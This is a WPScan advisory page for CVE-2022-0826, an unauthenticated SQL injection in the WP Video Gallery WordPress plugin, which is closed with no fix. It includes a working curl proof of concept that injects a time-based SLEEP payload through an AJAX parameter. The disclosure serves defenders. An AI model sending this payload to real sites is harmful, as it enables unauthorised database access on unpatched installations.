WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Video Gallery <= 1.7.1 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Proof of Concept

curl -s http://example.com/wp-admin/admin-ajax.php \
    --data 'action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(5)))uPaz)%2523'

Affects Plugins

wp-video-gallery-free
No known fix - plugin closed

References

CVE
CVE-2022-0826

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
7a3eed3b-c643-4e24-b833-eba60ab631c5

Timeline

Publicly Published

2022-04-13 (about 1 years ago)

Added

2022-04-13 (about 1 years ago)

Last Updated

2022-04-18 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin